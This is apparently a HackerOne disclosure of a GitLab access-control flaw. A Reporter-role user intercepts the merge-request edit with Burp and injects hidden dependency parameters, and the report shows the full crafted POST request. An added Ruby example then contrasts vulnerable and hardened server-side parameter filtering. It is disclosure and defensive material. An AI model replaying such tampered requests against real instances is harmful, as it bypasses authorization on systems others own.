Reporter Able to Edit Merge Requests Dependencies
HackerOne report #743339 by rafiem
on 2019-11-21, assigned to @jeremymatos:
Hi Team,
I have found improper access control in the GitLab merge request system. There is a new feature in merge requests, merge request dependencies. This setting makes the MR being edited unmergeable until the dependency MRs have already been merged. Even if I don't find a specific permission rule for merge request dependencies, I am sure that this setting can only be edited by a user with at least the Developer role (same as editing the assigned user or labels). In this case, a user with the Reporter role is able to change and edit the merge request dependencies.
Proof of Concept
1.) User A has a public or private project (in this report I use: https://gitlab.com/bambangyera/mokil)
2.) User A adds some branches to it
3.) User A then creates a random MR
4.) User A invites User B as Reporter to the project
5.) User B then creates an MR from the branch
6.) User B then tries to edit the MR that he/she created (in this report I use: bambangyera/mokil!4)
7.) As we can see, there is no option for editing the MR dependencies
8.) User B then turns on Burp Suite and intercepts the request for editing the MR
9.) In the body of the POST request, add the parameter merge_request%5Bblocking_merge_request_references%5D%5B%5D with as value the URL of the MR dependency, and the parameter merge_request%5Bupdate_blocking_merge_request_refs%5D with value true:
POST /bambangyera/mokil/merge_requests/4 HTTP/1.1
Host: gitlab.com
Connection: close
Content-Length: 362
Cache-Control: max-age=0
Origin: https://gitlab.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Referer: https://gitlab.com/bambangyera/mokil/merge_requests/4/edit
Accept-Encoding: gzip, deflate
Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: <REDACTED>
utf8=%E2%9C%93&_method=patch&authenticity_token=REDACTED2%3D%3D&merge_request%5Btarget_branch%5D=test&merge_request%5Btitle%5D=POC&merge_request%5Bdescription%5D=aaaaaaa&merge_request%5Bapprovals_before_merge%5D=0&merge_request%5Bsquash%5D=0&merge_request%5Block_version%5D=4&merge_request%5Bblocking_merge_request_references%5D%5B%5D=https%3A%2F%2Fgitlab.com%2Fbambangyera%2Fmokil%2Fmerge_requests%2F1&merge_request%5Bupdate_blocking_merge_request_refs%5D=true
- Forward the request
- As a result, the MR dependency is added to the MR being edited, even though the user (Reporter role) does not have or see the option when editing the MR
PoC video attached
PoC.webm
Impact
A user with the Reporter role is able to edit MR dependencies
Best Regards,
[@]rafiem
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
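The report's root cause is that the dependency fields were gated only by the edit form (the Reporter never sees the control) while the server accepted whatever `merge_request[...]` keys arrived in the PATCH body. The following Ruby snippet is an added illustration of that pattern and its fix, not GitLab's own code: the role table, the attribute lists, the `can_edit_dependencies?` check and the body parser are all hypothetical, and the sample body is constructed to mirror the shape of the request in the report (with a placeholder MR URL). It shows the vulnerable parameter handling beside a hardened version that enforces the role check at the point where the attributes are written, so a hidden UI control is no longer the only gate.

```ruby
require 'cgi'

# Hypothetical role ordering, modelled on the report's claim that editing
# dependencies should require at least the Developer role.
ROLE_LEVEL = { guest: 10, reporter: 20, developer: 30, maintainer: 40 }.freeze

# Attributes that need Developer or above. The first two are the keys the
# report shows being injected into the PATCH body; the others are examples
# the report compares them to (assignees, labels).
PRIVILEGED_ATTRS = %w[
  blocking_merge_request_references
  update_blocking_merge_request_refs
  assignee_ids
  label_ids
].freeze

# All attributes the edit form may legitimately carry (hypothetical list).
PERMITTED_ATTRS = (%w[title description target_branch squash lock_version] +
                   PRIVILEGED_ATTRS).freeze

# Constructed sample body in the same url-encoded shape as the report's request.
SAMPLE_BODY = 'utf8=%E2%9C%93&_method=patch&merge_request%5Btitle%5D=POC' \
              '&merge_request%5Bdescription%5D=aaaaaaa' \
              '&merge_request%5Bblocking_merge_request_references%5D%5B%5D=' \
              'https%3A%2F%2Fgitlab.example%2Fproj%2Fmerge_requests%2F1' \
              '&merge_request%5Bupdate_blocking_merge_request_refs%5D=true'

# Parse the form body into a hash keyed by the inner attribute name:
# merge_request[title] -> "title" (scalar), merge_request[x][] -> "x" (array).
def merge_request_params_from_body(body)
  params = {}
  CGI.parse(body).each do |key, values|
    m = key.match(/\Amerge_request\[([a-z_]+)\](\[\])?\z/)
    next unless m
    params[m[1]] = m[2] ? values : values.first
  end
  params
end

def can_edit_dependencies?(role)
  ROLE_LEVEL.fetch(role) >= ROLE_LEVEL[:developer]
end

# Vulnerable pattern: every permitted key is accepted regardless of who sent
# it; the only thing keeping a Reporter away from the dependency fields is
# that the form never renders them.
def vulnerable_update_params(_role, merge_request_params)
  merge_request_params.select { |k, _| PERMITTED_ATTRS.include?(k) }
end

# Hardened pattern: the role check happens on the server, next to the write.
# Privileged keys are silently dropped for roles below Developer, so a
# hand-crafted body cannot reach the dependency update.
def hardened_update_params(role, merge_request_params)
  allowed = merge_request_params.select { |k, _| PERMITTED_ATTRS.include?(k) }
  return allowed if can_edit_dependencies?(role)

  allowed.reject { |k, _| PRIVILEGED_ATTRS.include?(k) }
end

if __FILE__ == $PROGRAM_NAME
  params = merge_request_params_from_body(SAMPLE_BODY)
  puts "reporter, vulnerable: #{vulnerable_update_params(:reporter, params).keys.inspect}"
  puts "reporter, hardened:   #{hardened_update_params(:reporter, params).keys.inspect}"
  puts "developer, hardened:  #{hardened_update_params(:developer, params).keys.inspect}"
end
```

A regression test for the fix follows directly from the report: feed the Reporter's crafted body through the update path and assert that the dependency keys never reach the model, while the same body from a Developer keeps them.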